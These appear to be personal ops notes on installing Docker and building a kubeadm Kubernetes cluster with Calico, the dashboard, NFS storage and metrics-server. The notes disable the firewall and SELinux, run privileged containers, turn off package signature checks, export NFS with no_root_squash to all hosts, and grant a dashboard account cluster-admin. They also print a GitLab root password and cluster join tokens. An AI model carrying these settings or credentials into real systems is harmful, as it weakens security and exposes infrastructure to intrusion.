Docker Installation and Usage

I. Disable the firewall and SELinux

Check the status: systemctl status firewalld

1. Stop the firewall

systemctl stop firewalld

systemctl disable firewalld

Or:

systemctl stop firewalld.service #stop firewalld

systemctl disable firewalld.service #do not start firewalld at boot

Check the SELinux status: getenforce

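2. Disable SELinux

setenforce 0 switches to permissive mode (violations are logged but not blocked) until the next reboot.

SELINUX=disabled in the config file turns SELinux off permanently; it takes effect after a reboot.

sudo setenforce 0

sudo sed -i 's/^SELINUX=enforcing$/SELINUX=disabled/' /etc/selinux/config

Or:

vi /etc/sysconfig/selinux

Change SELINUX=enforcing to SELINUX=disabled #keeps SELinux off after a reboot

setenforce 0 #stop enforcing SELinux right away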
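The sed command above only matches when the line reads exactly SELINUX=enforcing. The following is a minimal sketch of a variant that rewrites the SELINUX= line whatever its current value is. The function name set_selinux_mode and the scratch file are hypothetical and only serve the illustration; GNU sed is assumed.

```shell
# Hypothetical helper: set the SELINUX= line of a config file to the given mode.
# Usage: set_selinux_mode FILE MODE   (MODE: enforcing | permissive | disabled)
set_selinux_mode() {
  local file=$1 mode=$2
  case "$mode" in
    enforcing|permissive|disabled) ;;
    *) echo "invalid mode: $mode" >&2; return 1 ;;
  esac
  # Rewrite only the uncommented SELINUX= line; SELINUXTYPE= is left untouched.
  sed -i "s/^SELINUX=.*/SELINUX=$mode/" "$file"
}

# Try it on a scratch copy rather than the real /etc/selinux/config.
demo_cfg=$(mktemp)
printf '# comment\nSELINUX=permissive\nSELINUXTYPE=targeted\n' > "$demo_cfg"
set_selinux_mode "$demo_cfg" disabled
grep '^SELINUX=' "$demo_cfg"
```

On a real host the call would be sudo-equivalent to set_selinux_mode /etc/selinux/config disabled, followed by a reboot.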

Get the SELinux status

getenforce

Installation per the Alibaba Cloud documentation

# Step 1: Install the required system tools

sudo yum install -y yum-utils device-mapper-persistent-data lvm2

# Step 2: Add the software repository

sudo yum-config-manager --add-repo https://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo

# Step 3

sudo sed -i 's+download.docker.com+mirrors.aliyun.com/docker-ce+' /etc/yum.repos.d/docker-ce.repo

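# Step 4: Refresh the cache and install Docker-CE

sudo yum makecache fast

sudo yum -y install docker-ce

# Step 5: Start the Docker service

sudo service docker start

# Note:

# The official repository enables only the latest stable packages by default. You can edit the repository file to get other versions. For example, the test repository is not enabled by default; you can enable it as follows. Other test channels can be enabled the same way.

# vim /etc/yum.repos.d/docker-ce.repo

# Under [docker-ce-test], change enabled=0 to enabled=1

#

# Installing a specific version of Docker-CE:

# Step 1: List the available Docker-CE versions: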

# yum list docker-ce.x86_64 --showduplicates | sort -r

# Loading mirror speeds from cached hostfile

# Loaded plugins: branch, fastestmirror, langpacks

# docker-ce.x86_64 17.03.1.ce-1.el7.centos docker-ce-stable

# docker-ce.x86_64 17.03.1.ce-1.el7.centos @docker-ce-stable

# docker-ce.x86_64 17.03.0.ce-1.el7.centos docker-ce-stable

# Available Packages

# Step 2: Install the chosen Docker-CE version (VERSION is, for example, 17.03.0.ce-1.el7.centos from the list above)

# sudo yum -y install docker-ce-[VERSION]

1. Install the required system tools

yum install -y yum-utils device-mapper-persistent-data lvm2

2. Configure the Alibaba Cloud yum repository for Docker

yum-config-manager --add-repo https://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo

3. List the docker-ce versions available for installation

yum list docker-ce.x86_64 --showduplicates | sort -r

4. Install a specific version, for example 19.03

yum install docker-ce-19.03.9-3.el7

yum install -y docker-ce-20.10.7 docker-ce-cli-20.10.7 containerd.io-1.4.6

yum install -y docker-ce-19.03.9-3.el7 docker-ce-cli-19.03.9-3.el7 containerd.io
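The package names above combine the package name with a version string taken from the yum list output. As a rough sketch, assuming the version column may carry an epoch prefix such as 3: (which is how recent docker-ce builds are usually listed), the mapping can be written as a small function. The name docker_pkg_spec is hypothetical.

```shell
# Hypothetical helper: turn a version column from `yum list --showduplicates`
# into an installable package spec by dropping an optional "EPOCH:" prefix.
docker_pkg_spec() {
  local pkg=$1 version=$2
  # ${version#*:} removes everything up to the first colon, if there is one.
  printf '%s-%s\n' "$pkg" "${version#*:}"
}

docker_pkg_spec docker-ce 3:19.03.9-3.el7
docker_pkg_spec docker-ce-cli 1:19.03.9-3.el7
docker_pkg_spec docker-ce 17.03.1.ce-1.el7.centos
```

The printed names can then be passed to yum install -y as in the commands above.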

Downgrade Docker (for compatibility): yum downgrade --setopt=obsoletes=0 -y <packages>

yum downgrade --setopt=obsoletes=0 -y docker-ce-19.03.9-3.el7 docker-ce-cli-19.03.9-3.el7 containerd.io

yum downgrade --setopt=obsoletes=0 -y docker-ce-18.09.9-3.el7 docker-ce-cli-18.09.9-3.el7 containerd.io

5. Start Docker

systemctl start docker #start Docker

systemctl enable docker #start Docker at boot

Or:

# Start Docker now and enable it at boot

systemctl enable docker --now

5.1 Install from local rpm packages

Download location: https://download.docker.com/linux/centos/7/x86_64/stable/Packages/

Note: for version 17 you also need to download the docker-ce-selinux package.

5.2 Docker architecture

Docker uses a traditional client/server (C/S) architecture, consisting of the Docker client and the Docker server (daemon).

[root@docker01 ~]# docker version

Client: Docker Engine - Community

Version: 20.10.6

API version: 1.41

Go version: go1.13.15

Git commit: 370c289

Built: Fri Apr 9 22:45:33 2021

OS/Arch: linux/amd64

Context: default

Experimental: true

Server: Docker Engine - Community

Engine:

Version: 20.10.6

API version: 1.41 (minimum version 1.12)

Go version: go1.13.15

Git commit: 8728dd2

Built: Fri Apr 9 22:43:57 2021

OS/Arch: linux/amd64

Experimental: false

containerd:

Version: 1.4.4

GitCommit: 05f951a3781f4f2c1911b05e61c160e9c30eaa8e

runc:

Version: 1.0.0-rc93

GitCommit: 12644e614e25b05da6fd08a38ffa0cfe1903fdec

docker-init:

Version: 0.19.0

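GitCommit: de40ad0

[root@docker01 ~]# docker system info #same as docker info; shows daemon-side details, which Zabbix can collect values from

Docker's main components are images, containers, registries, networks, and storage.

A container always needs an image to start from; a registry stores only images.

container -> image -> registry

6. First steps with Docker

Setting up nginx the traditional way takes the following steps:

1) Download the tarball

2) Unpack it

3) Create the service user and install the dependencies

4) Compile and install

With Docker, a single command is enough:

docker run --name nginx -d -p 80:80 nginx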

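7. Docker image management

7.1 Searching for images

docker search searches for images

A name with no / separator means it is an official image.

Tips for choosing an image:

1) Prefer official images

2) Prefer images with many stars

Official registry: hub.docker.com

7.2 Pulling images

docker pull (docker push uploads)

Registry mirrors (accelerators): Alibaba Cloud, DaoCloud, USTC, and the official Docker China mirror https://registry.docker-cn.com

docker pull centos:6.8 (if no tag is given, the latest tag is pulled by default)

Configure a mirror: Alibaba Cloud

Mirror address

https://ixq3daof.mirror.aliyuncs.com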

sudo mkdir -p /etc/docker

sudo tee /etc/docker/daemon.json <<-'EOF'

{

"registry-mirrors": ["https://ixq3daof.mirror.aliyuncs.com"]

}

EOF

sudo systemctl daemon-reload

sudo systemctl restart docker

Or, with several mirrors configured:

sudo mkdir -p /etc/docker

sudo tee /etc/docker/daemon.json <<-'EOF'

{

"registry-mirrors": [

"https://docker.1ms.run",

"https://docker.m.daocloud.io",

"https://docker.actima.top",

"https://docker.1panel.live",

"https://docker.aityp.com",

"https://docker.imgdb.de"

]

}

EOF

sudo systemctl daemon-reload

sudo systemctl restart docker
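When the mirror list is assembled by hand, a URL can easily end up in it twice. Here is a minimal sketch that prints a daemon.json body from a list of mirror URLs and skips any URL it has already seen. The function name render_daemon_json is hypothetical, and the output covers only the registry-mirrors key.

```shell
# Hypothetical helper: print a daemon.json body for the given mirror URLs,
# skipping URLs that were already listed.
render_daemon_json() {
  local seen="" list="" url
  for url in "$@"; do
    case " $seen " in
      *" $url "*) continue ;;          # duplicate, skip it
    esac
    seen="$seen $url"
    list="${list:+$list, }\"$url\""    # comma-separate the quoted URLs
  done
  printf '{\n  "registry-mirrors": [%s]\n}\n' "$list"
}

render_daemon_json \
  https://docker.1ms.run \
  https://docker.m.daocloud.io \
  https://docker.m.daocloud.io
```

The output can be piped into sudo tee /etc/docker/daemon.json, followed by the daemon-reload and restart commands shown above.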

# Pull the GitLab image

docker pull gitlab/gitlab-ce:latest

# Start the container

docker run \

-itd \

-p 9980:80 \

-p 9922:22 \

-v /home/gitlab/etc:/etc/gitlab \

-v /home/gitlab/log:/var/log/gitlab \

-v /home/gitlab/opt:/var/opt/gitlab \

--restart always \

--privileged=true \

--name gitlab \

gitlab/gitlab-ce

#The default user name is root.

#Look up the password with the following command:

docker exec -it gitlab grep 'Password:' /etc/gitlab/initial_root_password

The output looks like this:

Password: czVZitvqSsU8vbi1PPMm6expBBNCPs+JdWbMW7mnuzY=

docker run -dti \

--net=host \

--name=nexus \

--privileged=true \

--restart=always \

--ulimit nofile=655350 \

--ulimit memlock=-1 \

--memory=5G \

--memory-swap=-1 \

--cpuset-cpus='1-7' \

-e INSTALL4J_ADD_VM_PARAMS="-Xms4g -Xmx4g -XX:MaxDirectMemorySize=8g" \

-v /etc/localtime:/etc/localtime \

-v /data/nexus:/nexus-data \

sonatype/nexus3:latest

docker run -d --name nexus3 -p 8081:8081 -p 8082:8082 --restart always --privileged=true -v /home/nexus/data:/nexus-data sonatype/nexus3

docker run -d --name nexus03 -p 8081:8081 -p 8082:8082 --restart always --privileged=true -v /home/nexus/data:/nexus-data new_nexus3:tag

Entry in /etc/docker/daemon.json for the private registry:

"insecure-registries": ["10.10.10.36:8082"]

7.3 Listing images

docker images

docker image ls

7.4 Removing images

docker rmi

docker image rm

7.5 Exporting images

docker save

docker image save nginx > /opt/nginx.tar.gz

docker image save -o /opt/nginx.tar.gz nginx

7.6 Importing images

docker load

docker image load -i /opt/nginx.tar.gz

docker image load < /opt/nginx.tar.gz

7.7 Retagging an image

docker image tag nginx:latest wakuang:latest

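8. Container management

8.1 Running a container

docker run

docker container run --name centos -it centos /bin/bash

-it allocates an interactive terminal, starts the container, and drops you inside it

-d starts the container in the background

8.2 Listing containers

docker ps -a

docker container ls -a

-a show all containers

-q show only IDs, typically used for bulk removal

-l show only the most recently created container

--no-trunc do not truncate the output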

8.3 Stopping a container

docker stop ID

docker container stop ID

docker kill container_name/ID

8.4 Starting a container

docker start container_name/ID

docker container start container_name/ID

8.5 Entering a container

docker exec -it container_name/ID /bin/bash

docker container exec -it container_name/ID /bin/bash

docker attach #not recommended

nsenter #requires installing an extra package

8.6 Removing a container

docker rm -f container_name/ID

docker container rm -f container_name/ID

-f force removal; also removes running containers

8.7 Renaming a container

docker rename old_container_name new_container_name

Example: docker container rename nginx nginx01

9. Network access to Docker containers (port mapping)

-p hostPort:containerPort

-p ip:hostPort:containerPort

-P map every exposed container port to a random host port on all IPs

-p ip::containerPort

-p hostPort:containerPort/udp

-p 10.0.0.10::53/udp

-p 81:89 -p 443:443

iptables -t nat -L -n

sysctl -a | grep ipv4 | grep rang

net.ipv4.ip_local_port_range = 32768 60999 (the pool that random host ports come from)
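The -p forms listed above all follow the same pattern: an optional IP, an optional host port, a container port, and an optional protocol suffix. As an illustration only, the sketch below splits such a value into its parts. The function name parse_publish is hypothetical, and IPv6 addresses and port ranges are deliberately left out.

```shell
# Hypothetical helper: split a `docker run -p` value into its parts.
# Handles containerPort, hostPort:containerPort and ip:hostPort:containerPort,
# each with an optional /tcp or /udp suffix. IPv6 addresses are not handled.
parse_publish() {
  local spec=$1 proto=tcp ip="" host="" container=""
  case "$spec" in
    */*) proto=${spec##*/}; spec=${spec%/*} ;;   # peel off the protocol suffix
  esac
  local IFS=:
  set -- $spec            # split on ':'; an empty middle field is kept
  case $# in
    1) container=$1 ;;
    2) host=$1; container=$2 ;;
    3) ip=$1; host=$2; container=$3 ;;
    *) echo "unsupported spec" >&2; return 1 ;;
  esac
  echo "ip=${ip:-any} hostPort=${host:-random} containerPort=$container proto=$proto"
}

parse_publish 80:80
parse_publish 10.0.0.10::53/udp
```

An empty host port, as in 10.0.0.10::53/udp, is reported as random because Docker then picks a free port from the pool shown above.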

K8S cluster installation

Set the host names

hostnamectl set-hostname k8s-master

hostnamectl set-hostname node1

hostnamectl set-hostname node2

Set up name resolution in the local hosts file

echo "172.24.1.50 k8s-master

172.24.1.51 node1

172.24.1.52 node2

172.24.1.50 cluster-endpoint" >> /etc/hosts

Or:

scp /etc/hosts 172.24.1.51:/etc/hosts

scp /etc/hosts 172.24.1.52:/etc/hosts
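Appending with >> adds the same entries again every time the command is rerun. A minimal sketch of an idempotent variant follows, assuming host names that contain no regex metacharacters other than the hyphen. The function name add_host_entry is hypothetical and the demo works on a scratch file instead of /etc/hosts.

```shell
# Hypothetical helper: append "IP NAME" to a hosts file unless NAME is already mapped.
add_host_entry() {
  local file=$1 ip=$2 name=$3
  if grep -qE "[[:space:]]${name}([[:space:]]|\$)" "$file" 2>/dev/null; then
    return 0                      # name already present, leave the file alone
  fi
  printf '%s %s\n' "$ip" "$name" >> "$file"
}

hosts_copy=$(mktemp)              # scratch file standing in for /etc/hosts
add_host_entry "$hosts_copy" 172.24.1.50 k8s-master
add_host_entry "$hosts_copy" 172.24.1.51 node1
add_host_entry "$hosts_copy" 172.24.1.50 k8s-master   # second call is a no-op
cat "$hosts_copy"
```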

Home lab

172.31.10.251 k8s-master

172.31.10.252 node1

172.31.10.253 node2

172.31.10.251 cluster-endpoint

Disable the swap partition

#turn off swap

swapoff -a

sed -ri 's/.*swap.*/#&/' /etc/fstab

Set up SSH key authentication and copy the key to every node

ssh-keygen

[root@k8s-master ~]# ls .ssh

id_rsa id_rsa.pub

ssh-copy-id root@172.24.1.50

ssh-copy-id root@172.24.1.51

ssh-copy-id root@172.24.1.52

Or:

ssh-keygen -t rsa

ssh-copy-id -i ~/.ssh/id_rsa.pub root@172.24.1.50

ssh-copy-id -i ~/.ssh/id_rsa.pub root@172.24.1.51

ssh-copy-id -i ~/.ssh/id_rsa.pub root@172.24.1.52

NTP server setup

vim /etc/chrony.conf

#server 0.centos.pool.ntp.org iburst

#server 1.centos.pool.ntp.org iburst

#server 2.centos.pool.ntp.org iburst

#server 3.centos.pool.ntp.org iburst

server ntp.aliyun.com iburst

server ntp1.aliyun.com iburst

server ntp2.aliyun.com iburst

server ntp3.aliyun.com iburst

server ntp4.aliyun.com iburst

server ntp5.aliyun.com iburst

# Allow NTP client access from local network.

allow 172.24.1.0/24

# Serve time even if not synchronized to a time source.

local stratum 10

systemctl restart chronyd #restart the service

NTP client configuration

[root@keepalived01 ~]# rpm -q chrony

chrony-3.4-1.el7.x86_64

vim /etc/chrony.conf

# Comment out the other lines that start with server and add the local NTP server

server 172.24.1.50 iburst

[root@keepalived01 ~]# systemctl restart chronyd

[root@keepalived01 ~]# systemctl enable chronyd

[root@keepalived01 ~]# systemctl status chronyd

[root@keepalived01 ~]# chronyc sources -n

210 Number of sources = 1

MS Name/IP address Stratum Poll Reach LastRx Last sample

===============================================================================

^* k8s-master 3 6 17 7 -14us[ -52us] +/- 17ms

chronyc -a makestep #step the clock immediately to force a sync

sudo yum remove docker*

sudo yum install -y yum-utils

#Configure the Docker yum repository

sudo yum-config-manager \

--add-repo \

http://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo

#Install a specific version

sudo yum install -y docker-ce-20.10.7 docker-ce-cli-20.10.7 containerd.io-1.4.6

# Start Docker now and enable it at boot

systemctl enable docker --now

# Configure a Docker registry mirror

sudo mkdir -p /etc/docker

sudo tee /etc/docker/daemon.json <<-'EOF'

{

"registry-mirrors": ["https://ixq3daof.mirror.aliyuncs.com"]

}

EOF

sudo systemctl daemon-reload

sudo systemctl restart docker

#turn off swap

swapoff -a

sed -ri 's/.*swap.*/#&/' /etc/fstab
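Running the sed command above a second time prefixes the swap line with another #. The sketch below is one possible way to make the edit repeatable by skipping lines that are already comments. The function name comment_out_swap is hypothetical, GNU sed is assumed, and the demo edits a scratch file rather than /etc/fstab.

```shell
# Hypothetical helper: comment out active swap entries in an fstab-style file.
# Lines that are already comments are skipped, so repeated runs do not stack '#'.
comment_out_swap() {
  sed -i -E '/^[[:space:]]*#/!s/^.*[[:space:]]swap[[:space:]].*$/#&/' "$1"
}

fstab_copy=$(mktemp)              # scratch file standing in for /etc/fstab
printf '%s\n' \
  '/dev/mapper/centos-root / xfs defaults 0 0' \
  '/dev/mapper/centos-swap swap swap defaults 0 0' > "$fstab_copy"
comment_out_swap "$fstab_copy"
comment_out_swap "$fstab_copy"    # second run changes nothing
cat "$fstab_copy"
```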

#Let iptables see bridged traffic

cat <<EOF | sudo tee /etc/modules-load.d/k8s.conf

br_netfilter

EOF

cat <<EOF | sudo tee /etc/sysctl.d/k8s.conf

net.bridge.bridge-nf-call-ip6tables = 1

net.bridge.bridge-nf-call-iptables = 1

EOF

sudo sysctl --system

Install kubelet, kubeadm, and kubectl

#Configure the Kubernetes yum repository

cat <<EOF | sudo tee /etc/yum.repos.d/kubernetes.repo

[kubernetes]

name=Kubernetes

baseurl=http://mirrors.aliyun.com/kubernetes/yum/repos/kubernetes-el7-x86_64

enabled=1

gpgcheck=0

repo_gpgcheck=0

gpgkey=http://mirrors.aliyun.com/kubernetes/yum/doc/yum-key.gpg

http://mirrors.aliyun.com/kubernetes/yum/doc/rpm-package-key.gpg

EOF

#Install kubelet, kubeadm, and kubectl

sudo yum install -y kubelet-1.20.9 kubeadm-1.20.9 kubectl-1.20.9

#Start kubelet

sudo systemctl enable --now kubelet

Download the images each machine needs

sudo tee ./images.sh <<-'EOF'

#!/bin/bash

images=(

kube-apiserver:v1.20.9

kube-proxy:v1.20.9

kube-controller-manager:v1.20.9

kube-scheduler:v1.20.9

coredns:1.7.0

etcd:3.4.13-0

pause:3.2

)

for imageName in ${images[@]} ; do

docker pull registry.cn-hangzhou.aliyuncs.com/lfy_k8s_images/$imageName

done

EOF

chmod +x ./images.sh && ./images.sh

[root@k8s-master ~]# docker images

REPOSITORY TAG IMAGE ID CREATED SIZE

registry.cn-hangzhou.aliyuncs.com/lfy_k8s_images/kube-proxy v1.20.9 8dbf9a6aa186 13 months ago 99.7MB

registry.cn-hangzhou.aliyuncs.com/lfy_k8s_images/kube-scheduler v1.20.9 295014c114b3 13 months ago 47.3MB

registry.cn-hangzhou.aliyuncs.com/lfy_k8s_images/kube-apiserver v1.20.9 0d0d57e4f64c 13 months ago 122MB

registry.cn-hangzhou.aliyuncs.com/lfy_k8s_images/kube-controller-manager v1.20.9 eb07fd4ad3b4 13 months ago 116MB

registry.cn-hangzhou.aliyuncs.com/lfy_k8s_images/etcd 3.4.13-0 0369cf4303ff 2 years ago 253MB

registry.cn-hangzhou.aliyuncs.com/lfy_k8s_images/coredns 1.7.0 bfe3a36ebd25 2 years ago 45.2MB

registry.cn-hangzhou.aliyuncs.com/lfy_k8s_images/pause 3.2 80d28bedfe5d 2 years ago 683kB
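Before pulling, it can help to print the full image references and review them. The following is a small sketch of such a dry run. The function name list_k8s_images and the REPO variable are hypothetical, and the add-on versions are simply the ones listed in this guide for v1.20.9.

```shell
# Repository used in this guide; the variable name is an assumption for the sketch.
REPO=registry.cn-hangzhou.aliyuncs.com/lfy_k8s_images

# Hypothetical helper: print the full image reference for each component
# instead of pulling it, so the list can be reviewed first.
list_k8s_images() {
  local version=$1 name
  for name in kube-apiserver kube-proxy kube-controller-manager kube-scheduler; do
    echo "$REPO/$name:$version"
  done
  # Add-on image versions as listed in this guide for v1.20.9.
  echo "$REPO/coredns:1.7.0"
  echo "$REPO/etcd:3.4.13-0"
  echo "$REPO/pause:3.2"
}

list_k8s_images v1.20.9
```

Once the list looks right, it can be fed to the pull step, for example with list_k8s_images v1.20.9 | xargs -n1 docker pull.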

Initialize the master node (run on the master node only)

#Add the master host mapping on every machine; change the address below to your own

echo "172.24.1.50 cluster-endpoint" >> /etc/hosts

kubeadm init \

--apiserver-advertise-address=172.24.1.50 \

--control-plane-endpoint=k8s-master \

--image-repository registry.cn-hangzhou.aliyuncs.com/lfy_k8s_images \

--kubernetes-version v1.20.9 \

--service-cidr=10.96.0.0/16 \

--pod-network-cidr=192.168.0.0/16

Home lab

#Add the master host mapping on every machine; change the address below to your own

echo "172.31.10.251 cluster-endpoint" >> /etc/hosts

kubeadm init \

--apiserver-advertise-address=172.31.10.251 \

--control-plane-endpoint=k8s-master \

--image-repository registry.cn-hangzhou.aliyuncs.com/lfy_k8s_images \

--kubernetes-version v1.20.9 \

--service-cidr=10.96.0.0/16 \

--pod-network-cidr=192.168.0.0/16

Record the key information

Your Kubernetes control-plane has initialized successfully!

To start using your cluster, you need to run the following as a regular user:

mkdir -p $HOME/.kube

sudo cp -i /etc/kubernetes/admin.conf $HOME/.kube/config

sudo chown $(id -u):$(id -g) $HOME/.kube/config

Alternatively, if you are the root user, you can run:

export KUBECONFIG=/etc/kubernetes/admin.conf

You should now deploy a pod network to the cluster.

Run "kubectl apply -f [podnetwork].yaml" with one of the options listed at:

https://kubernetes.io/docs/concepts/cluster-administration/addons/

You can now join any number of control-plane nodes by copying certificate authorities

and service account keys on each node and then running the following as root:

kubeadm join k8s-master:6443 --token dk9zbs.twclc09taxedmwkj \

--discovery-token-ca-cert-hash sha256:6ea2e61397561db0310b122a5a7220f545573bc36c9ef1118b4840960e3a2012 \

--control-plane

Then you can join any number of worker nodes by running the following on each as root:

kubeadm join k8s-master:6443 --token dk9zbs.twclc09taxedmwkj \

--discovery-token-ca-cert-hash sha256:6ea2e61397561db0310b122a5a7220f545573bc36c9ef1118b4840960e3a2012

Your Kubernetes control-plane has initialized successfully!

To start using your cluster, you need to run the following as a regular user:

mkdir -p $HOME/.kube

sudo cp -i /etc/kubernetes/admin.conf $HOME/.kube/config

sudo chown $(id -u):$(id -g) $HOME/.kube/config

Alternatively, if you are the root user, you can run:

export KUBECONFIG=/etc/kubernetes/admin.conf

You should now deploy a pod network to the cluster.

Run "kubectl apply -f [podnetwork].yaml" with one of the options listed at:

https://kubernetes.io/docs/concepts/cluster-administration/addons/

You can now join any number of control-plane nodes by copying certificate authorities

and service account keys on each node and then running the following as root:

kubeadm join k8s-master:6443 --token bi5y3r.43jxb8e622he6qz5 \

--discovery-token-ca-cert-hash sha256:5bd452ee3f9ed1365411035fad1aa9968713f91adb61efa002ce9d466b520123 \

--control-plane

Then you can join any number of worker nodes by running the following on each as root:

kubeadm join k8s-master:6443 --token bi5y3r.43jxb8e622he6qz5 \

--discovery-token-ca-cert-hash sha256:5bd452ee3f9ed1365411035fad1aa9968713f91adb61efa002ce9d466b520123

Follow the instructions above

mkdir -p $HOME/.kube

sudo cp -i /etc/kubernetes/admin.conf $HOME/.kube/config

sudo chown $(id -u):$(id -g) $HOME/.kube/config

[root@k8s-master ~]# kubectl get nodes

NAME STATUS ROLES AGE VERSION



k8s-master NotReady control-plane,master 3m55s v1.20.9安装Calico网络插件

#这个会报错用下面新版本 curl https://docs.projectcalico.org/manifests/calico.yaml -O

用这个版本

curl https://docs.projectcalico.org/v3.20/manifests/calico.yaml -O

下载完成后 执行安装

kubectl apply -f calico.yaml

查看安装进度

kubectl get pod -A加入worker节点[用上面记录的关键信息加入node节点]

过期后获取新令牌

kubeadm token create --print-join-command
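A kubeadm bootstrap token consists of 6 characters, a dot, and 16 characters, all lowercase letters or digits. As a quick sanity check before pasting a join command, a sketch like the following can catch a truncated or mistyped token. The function name is_bootstrap_token is hypothetical.

```shell
# Hypothetical helper: check that a string looks like a kubeadm bootstrap token
# (6 characters, a dot, 16 characters, all lowercase letters or digits).
is_bootstrap_token() {
  printf '%s\n' "$1" | grep -Eq '^[a-z0-9]{6}\.[a-z0-9]{16}$'
}

for t in bi5y3r.43jxb8e622he6qz5 not-a-token; do
  if is_bootstrap_token "$t"; then
    echo "$t: ok"
  else
    echo "$t: malformed"
  fi
done
```

The check only covers the format; whether a token is still valid has to be confirmed on the master, for example with kubeadm token list.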

kubeadm join k8s-master:6443 --token bi5y3r.43jxb8e622he6qz5 \

--discovery-token-ca-cert-hash sha256:5bd452ee3f9ed1365411035fad1aa9968713f91adb61efa002ce9d466b520123查看加入的node节点



kubectl get nodes部署dashboard

1、部署

kubernetes官方提供的可视化界面 https://github.com/kubernetes/dashboard

kubectl apply -f https://raw.githubusercontent.com/kubernetes/dashboard/v2.3.1/aio/deploy/recommended.yaml2、设置访问端口

kubectl edit svc kubernetes-dashboard -n kubernetes-dashboardtype: ClusterIP 改为 type: NodePort

kubectl get svc -A |grep kubernetes-dashboard

## 找到端口,在安全组放行访问: https://集群任意IP:端口 https://172.31.10.252:32759

3. Create an access account

#Create the access account; prepare a yaml file: vi dash.yaml

apiVersion: v1
kind: ServiceAccount
metadata:
  name: admin-user
  namespace: kubernetes-dashboard
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: admin-user
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
- kind: ServiceAccount
  name: admin-user
  namespace: kubernetes-dashboard

kubectl apply -f dash.yaml

4. Log in with a token

#Get the access token

kubectl -n kubernetes-dashboard get secret $(kubectl -n kubernetes-dashboard get sa/admin-user -o jsonpath="{.secrets[0].name}") -o go-template="{{.data.token | base64decode}}"

The command prints the token, a long JWT string; paste it into the dashboard login page.

5. UI

Prerequisites for installing KubeSphere

NFS file system

Install on every node

yum install -y nfs-utils

# Run the following command on the master

echo "/nfs/data/ *(insecure,rw,sync,no_root_squash)" > /etc/exports

# Create the shared directory, then start the NFS service

mkdir -p /nfs/data

# Run on the master

systemctl enable rpcbind

systemctl enable nfs-server

systemctl start rpcbind

systemctl start nfs-server

# Apply the configuration

exportfs -r

#Check that the configuration took effect

exportfs

Configure the NFS client (optional); change the IP address to your own

showmount -e 172.24.1.50

mkdir -p /nfs/data

mount -t nfs 172.24.1.50:/nfs/data /nfs/data

Configure default storage

Configure a default StorageClass with dynamic provisioning

In sc.yaml below, change the NFS server address (172.24.1.50) and the shared directory (/nfs/data) to your own values.

vim sc.yaml

## Creates a StorageClass
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: nfs-storage
  annotations:
    storageclass.kubernetes.io/is-default-class: "true"
provisioner: k8s-sigs.io/nfs-subdir-external-provisioner
parameters:
  archiveOnDelete: "true" ## whether to archive the PV contents when the PV is deleted
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: nfs-client-provisioner
  labels:
    app: nfs-client-provisioner
  # replace with namespace where provisioner is deployed
  namespace: default
spec:
  replicas: 1
  strategy:
    type: Recreate
  selector:
    matchLabels:
      app: nfs-client-provisioner
  template:
    metadata:
      labels:
        app: nfs-client-provisioner
    spec:
      serviceAccountName: nfs-client-provisioner
      containers:
        - name: nfs-client-provisioner
          image: registry.cn-hangzhou.aliyuncs.com/lfy_k8s_images/nfs-subdir-external-provisioner:v4.0.2
          # resources:
          #   limits:
          #     cpu: 10m
          #   requests:
          #     cpu: 10m
          volumeMounts:
            - name: nfs-client-root
              mountPath: /persistentvolumes
          env:
            - name: PROVISIONER_NAME
              value: k8s-sigs.io/nfs-subdir-external-provisioner
            - name: NFS_SERVER
              value: 172.24.1.50 ## your own NFS server address
            - name: NFS_PATH
              value: /nfs/data ## directory shared by the NFS server
      volumes:
        - name: nfs-client-root
          nfs:
            server: 172.24.1.50
            path: /nfs/data
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: nfs-client-provisioner
  # replace with namespace where provisioner is deployed
  namespace: default
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: nfs-client-provisioner-runner
rules:
  - apiGroups: [""]
    resources: ["nodes"]
    verbs: ["get", "list", "watch"]
  - apiGroups: [""]
    resources: ["persistentvolumes"]
    verbs: ["get", "list", "watch", "create", "delete"]
  - apiGroups: [""]
    resources: ["persistentvolumeclaims"]
    verbs: ["get", "list", "watch", "update"]
  - apiGroups: ["storage.k8s.io"]
    resources: ["storageclasses"]
    verbs: ["get", "list", "watch"]
  - apiGroups: [""]
    resources: ["events"]
    verbs: ["create", "update", "patch"]
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: run-nfs-client-provisioner
subjects:
  - kind: ServiceAccount
    name: nfs-client-provisioner
    # replace with namespace where provisioner is deployed
    namespace: default
roleRef:
  kind: ClusterRole
  name: nfs-client-provisioner-runner
  apiGroup: rbac.authorization.k8s.io
---
kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: leader-locking-nfs-client-provisioner
  # replace with namespace where provisioner is deployed
  namespace: default
rules:
  - apiGroups: [""]
    resources: ["endpoints"]
    verbs: ["get", "list", "watch", "create", "update", "patch"]
---
kind: RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  name: leader-locking-nfs-client-provisioner
  # replace with namespace where provisioner is deployed
  namespace: default
subjects:
  - kind: ServiceAccount
    name: nfs-client-provisioner
    # replace with namespace where provisioner is deployed
    namespace: default
roleRef:
  kind: Role
  name: leader-locking-nfs-client-provisioner
  apiGroup: rbac.authorization.k8s.io

Apply it

[root@k8s-master ~]# kubectl apply -f sc.yaml

Check the dynamically provisioned default StorageClass

[root@k8s-master ~]# kubectl get sc

NAME PROVISIONER RECLAIMPOLICY VOLUMEBINDINGMODE ALLOWVOLUMEEXPANSION AGE

nfs-storage (default) k8s-sigs.io/nfs-subdir-external-provisioner Delete Immediate false 39s

metrics-server: cluster metrics monitoring component

vi metrics.yaml

apiVersion: v1
kind: ServiceAccount
metadata:
  labels:
    k8s-app: metrics-server
  name: metrics-server
  namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  labels:
    k8s-app: metrics-server
    rbac.authorization.k8s.io/aggregate-to-admin: "true"
    rbac.authorization.k8s.io/aggregate-to-edit: "true"
    rbac.authorization.k8s.io/aggregate-to-view: "true"
  name: system:aggregated-metrics-reader
rules:
- apiGroups:
  - metrics.k8s.io
  resources:
  - pods
  - nodes
